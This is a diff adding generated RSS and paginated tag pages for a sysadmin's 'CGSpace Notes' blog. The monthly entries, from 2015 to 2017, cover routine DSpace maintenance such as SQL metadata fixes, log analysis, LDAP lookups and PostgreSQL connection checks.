https://alanorth.github.io/cgspace-notes/2017-02/ + Tue, 07 Feb 2017 07:04:52 -0800 + + https://alanorth.github.io/cgspace-notes/2017-02/ + <h2 id="2017-02-07">2017-02-07</h2> +<ul> +<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> +</ul> +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; + id | collection_id | item_id +-------+---------------+--------- + 92551 | 313 | 80278 + 92550 | 313 | 80278 + 90774 | 1051 | 80278 +(3 rows) +dspace=# delete from collection2item where id = 92551 and item_id = 80278; +DELETE 1 +</code></pre><ul> +<li>Create issue 
on GitHub to track the addition of CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/issues/301">#301</a>)</li> +<li>Looks like we&rsquo;ll be using <code>cg.identifier.ccafsprojectpii</code> as the field name</li> +</ul> + + + + January, 2017 + https://alanorth.github.io/cgspace-notes/2017-01/ + Mon, 02 Jan 2017 10:43:00 +0300 + + https://alanorth.github.io/cgspace-notes/2017-01/ + <h2 id="2017-01-02">2017-01-02</h2> +<ul> +<li>I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error</li> +<li>I tested on DSpace Test as well and it doesn&rsquo;t work there either</li> +<li>I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years</li> +</ul> + + + + December, 2016 + https://alanorth.github.io/cgspace-notes/2016-12/ + Fri, 02 Dec 2016 10:43:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-12/ + <h2 id="2016-12-02">2016-12-02</h2> +<ul> +<li>CGSpace was down for five hours in the morning while I was sleeping</li> +<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> +</ul> +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +</code></pre><ul> +<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> +<li>I&rsquo;ve 
raised a ticket with Atmire to ask</li> +<li>Another worrying error from dspace.log is:</li> +</ul> + + + + November, 2016 + https://alanorth.github.io/cgspace-notes/2016-11/ + Tue, 01 Nov 2016 09:21:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-11/ + <h2 id="2016-11-01">2016-11-01</h2> +<ul> +<li>Add <code>dc.type</code> to the output options for Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/pull/286">#286</a>)</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/11/listings-and-reports.png" alt="Listings and Reports with output type"></p> + + + + October, 2016 + https://alanorth.github.io/cgspace-notes/2016-10/ + Mon, 03 Oct 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-10/ + <h2 id="2016-10-03">2016-10-03</h2> +<ul> +<li>Testing adding <a href="https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing">ORCIDs to a CSV</a> file for a single item to see if the author orders get messed up</li> +<li>Need to test the following scenarios to see how author order is affected: +<ul> +<li>ORCIDs only</li> +<li>ORCIDs plus normal authors</li> +</ul> +</li> +<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new coloum called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li> +</ul> +<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X +</code></pre> + + + + September, 2016 + https://alanorth.github.io/cgspace-notes/2016-09/ + Thu, 01 Sep 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-09/ + <h2 id="2016-09-01">2016-09-01</h2> +<ul> +<li>Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors</li> +<li>Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace</li> +<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> +<li>It looks like we might be able to use OUs now, instead of DCs:</li> +</ul> +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; +</code></pre> + + + + August, 2016 + https://alanorth.github.io/cgspace-notes/2016-08/ + Mon, 01 Aug 2016 15:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-08/ + <h2 id="2016-08-01">2016-08-01</h2> +<ul> +<li>Add updated distribution license from Sisay (<a href="https://github.com/ilri/DSpace/issues/259">#259</a>)</li> +<li>Play with upgrading Mirage 2 dependencies in <code>bower.json</code> because most are several versions of out date</li> +<li>Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more</li> +<li>bower stuff is a dead end, waste of time, too many issues</li> +<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li> +<li>Start working on DSpace 5.1 → 5.5 port:</li> +</ul> +<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod +$ git reset --hard ilri/5_x-prod +$ git rebase -i dspace-5.5 +</code></pre> + + + + July, 2016 + https://alanorth.github.io/cgspace-notes/2016-07/ + Fri, 01 Jul 2016 10:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-07/ + <h2 
id="2016-07-01">2016-07-01</h2> +<ul> +<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> +<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> +</ul> +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; +UPDATE 95 +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; + text_value +------------ +(0 rows) +</code></pre><ul> +<li>In this case the select query was showing 95 results before the update</li> +</ul> + + + + June, 2016 + https://alanorth.github.io/cgspace-notes/2016-06/ + Wed, 01 Jun 2016 10:53:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-06/ + <h2 id="2016-06-01">2016-06-01</h2> +<ul> +<li>Experimenting with IFPRI OAI (we want to harvest their publications)</li> +<li>After reading the <a href="https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html">ContentDM documentation</a> I found IFPRI&rsquo;s OAI endpoint: <a href="http://ebrary.ifpri.org/oai/oai.php">http://ebrary.ifpri.org/oai/oai.php</a></li> +<li>After reading the <a href="https://www.openarchives.org/OAI/openarchivesprotocol.html">OAI documentation</a> and testing with an <a href="http://validator.oaipmh.com/">OAI validator</a> I found out how to get their publications</li> +<li>This is their publications set: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc">http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc</a></li> +<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li> +<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li> +</ul> + + + + May, 2016 + https://alanorth.github.io/cgspace-notes/2016-05/ + Sun, 01 May 2016 23:06:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-05/ + <h2 id="2016-05-01">2016-05-01</h2> +<ul> +<li>Since yesterday there have been 10,000 REST errors and the site has been unstable again</li> +<li>I have blocked access to the API now</li> +<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> +</ul> +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l +3168 +</code></pre> + + + + April, 2016 + https://alanorth.github.io/cgspace-notes/2016-04/ + Mon, 04 Apr 2016 11:06:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-04/ + <h2 id="2016-04-04">2016-04-04</h2> +<ul> +<li>Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit</li> +<li>We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc</li> +<li>After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!</li> +<li>This will save us a few gigs 
of backup space we&rsquo;re paying for on S3</li> +<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li> +</ul> + + + + March, 2016 + https://alanorth.github.io/cgspace-notes/2016-03/ + Wed, 02 Mar 2016 16:50:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-03/ + <h2 id="2016-03-02">2016-03-02</h2> +<ul> +<li>Looking at issues with author authorities on CGSpace</li> +<li>For some reason we still have the <code>index-lucene-update</code> cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module</li> +<li>Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server</li> +</ul> + + + + February, 2016 + https://alanorth.github.io/cgspace-notes/2016-02/ + Fri, 05 Feb 2016 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-02/ + <h2 id="2016-02-05">2016-02-05</h2> +<ul> +<li>Looking at some DAGRIS data for Abenet Yabowork</li> +<li>Lots of issues with spaces, newlines, etc causing the import to fail</li> +<li>I noticed we have a very <em>interesting</em> list of countries on CGSpace:</li> +</ul> +<p><img src="https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/02/cgspace-countries.png" alt="CGSpace country list"></p> +<ul> +<li>Not only are there 49,000 countries, we have some blanks (25)&hellip;</li> +<li>Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;</li> +</ul> + + + + January, 2016 + https://alanorth.github.io/cgspace-notes/2016-01/ + Wed, 13 Jan 2016 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2016-01/ + <h2 id="2016-01-13">2016-01-13</h2> +<ul> +<li>Move ILRI collection <code>10568/12503</code> from <code>10568/27869</code> to <code>10568/27629</code> using the <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">move_collections.sh</a> script I wrote last year.</li> +<li>I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.</li> +<li>Update GitHub wiki for documentation of <a href="https://github.com/ilri/DSpace/wiki/Maintenance-Tasks">maintenance tasks</a>.</li> +</ul> + + + + December, 2015 + https://alanorth.github.io/cgspace-notes/2015-12/ + Wed, 02 Dec 2015 13:18:00 +0300 + + https://alanorth.github.io/cgspace-notes/2015-12/ + <h2 id="2015-12-02">2015-12-02</h2> +<ul> +<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li> +</ul> +<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log +# ls -lh dspace.log.2015-11-18* +-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18 +-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo +-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz +</code></pre> + + + + November, 2015 + https://alanorth.github.io/cgspace-notes/2015-11/ + Mon, 23 Nov 2015 17:00:57 +0300 + + https://alanorth.github.io/cgspace-notes/2015-11/ + <h2 id="2015-11-22">2015-11-22</h2> +<ul> +<li>CGSpace went down</li> +<li>Looks like DSpace exhausted its PostgreSQL connection pool</li> +<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> +</ul> +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c 
cgspace +78 +</code></pre> + + + + diff --git a/docs/tags/notes/page/1/index.html b/docs/tags/notes/page/1/index.html new file mode 100644 index 000000000..f1074da31 --- /dev/null +++ b/docs/tags/notes/page/1/index.html @@ -0,0 +1,10 @@ + + + + https://alanorth.github.io/cgspace-notes/tags/notes/ + + + + + + diff --git a/docs/tags/notes/page/2/index.html b/docs/tags/notes/page/2/index.html new file mode 100644 index 000000000..486e73f36 --- /dev/null +++ b/docs/tags/notes/page/2/index.html @@ -0,0 +1,425 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

November, 2016

+ +
+

2016-11-01

+
    +
  • Add dc.type to the output options for Atmire’s Listings and Reports module (#286)
  • +
+

Listings and Reports with output type

+ Read more → +
+ + + + + + +
+
+

October, 2016

+ +
+

2016-10-03

+
    +
  • Testing adding ORCIDs to a CSV file for a single item to see if the author orders get messed up
  • +
  • Need to test the following scenarios to see how author order is affected: +
      +
    • ORCIDs only
    • +
    • ORCIDs plus normal authors
    • +
    +
  • +
  • I exported a random item’s metadata as CSV, deleted all columns except id and collection, and made a new column called ORCID:dc.contributor.author with the following random ORCIDs from the ORCID registry:
  • +
+
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+
+ Read more → +
+ + + + + + +
+
+

September, 2016

+ +
+

2016-09-01

+
    +
  • Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors
  • +
  • Discuss how the migration of CGIAR’s Active Directory to a flat structure will break our LDAP groups in DSpace
  • +
  • We had been using DC=ILRI to determine whether a user was ILRI or not
  • +
  • It looks like we might be able to use OUs now, instead of DCs:
  • +
+
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+
+ Read more → +
+ + + + + + +
+
+

August, 2016

+ +
+

2016-08-01

+
    +
  • Add updated distribution license from Sisay (#259)
  • +
  • Play with upgrading Mirage 2 dependencies in bower.json because most are several versions out of date
  • +
  • Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more
  • +
  • bower stuff is a dead end, waste of time, too many issues
  • +
  • Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of fonts)
  • +
  • Start working on DSpace 5.1 → 5.5 port:
  • +
+
$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+
+ Read more → +
+ + + + + + +
+
+

July, 2016

+ +
+

2016-07-01

+
    +
  • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
  • +
  • I think this query should find and replace all authors that have “,” at the end of their names:
  • +
+
dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+ text_value
+------------
+(0 rows)
+
    +
  • In this case the select query was showing 95 results before the update
  • +
+ Read more → +
+ + + + + + +
+
+

June, 2016

+ +
+

2016-06-01

+ + Read more → +
+ + + + + + +
+
+

May, 2016

+ +
+

2016-05-01

+
    +
  • Since yesterday there have been 10,000 REST errors and the site has been unstable again
  • +
  • I have blocked access to the API now
  • +
  • There are 3,000 IPs accessing the REST API in a 24-hour period!
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
+3168
+
+ Read more → +
+ + + + + + +
+
+

April, 2016

+ +
+

2016-04-04

+
    +
  • Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit
  • +
  • We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc
  • +
  • After running DSpace for over five years I’ve never needed to look in any other log file than dspace.log, let alone one from last year!
  • +
  • This will save us a few gigs of backup space we’re paying for on S3
  • +
  • Also, I noticed the checker log has some errors we should pay attention to:
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2016

+ +
+

2016-03-02

+
    +
  • Looking at issues with author authorities on CGSpace
  • +
  • For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module
  • +
  • Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2016

+ +
+

2016-02-05

+
    +
  • Looking at some DAGRIS data for Abenet Yabowork
  • +
  • Lots of issues with spaces, newlines, etc causing the import to fail
  • +
  • I noticed we have a very interesting list of countries on CGSpace:
  • +
+

CGSpace country list

+
    +
  • Not only are there 49,000 countries, we have some blanks (25)…
  • +
  • Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE”
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/tags/notes/page/3/index.html b/docs/tags/notes/page/3/index.html new file mode 100644 index 000000000..87f1eb4bc --- /dev/null +++ b/docs/tags/notes/page/3/index.html @@ -0,0 +1,234 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

January, 2016

+ +
+

2016-01-13

+
    +
  • Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_collections.sh script I wrote last year.
  • +
  • I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
  • +
  • Update GitHub wiki for documentation of maintenance tasks.
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2015

+ +
+

2015-12-02

+
    +
  • Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less space:
  • +
+
# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+
+ Read more → +
+ + + + + + +
+
+

November, 2015

+ +
+

2015-11-22

+
    +
  • CGSpace went down
  • +
  • Looks like DSpace exhausted its PostgreSQL connection pool
  • +
  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+78
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/tags/page/1/index.html b/docs/tags/page/1/index.html new file mode 100644 index 000000000..435aa6c39 --- /dev/null +++ b/docs/tags/page/1/index.html @@ -0,0 +1,10 @@ + + + + https://alanorth.github.io/cgspace-notes/tags/ + + + + + +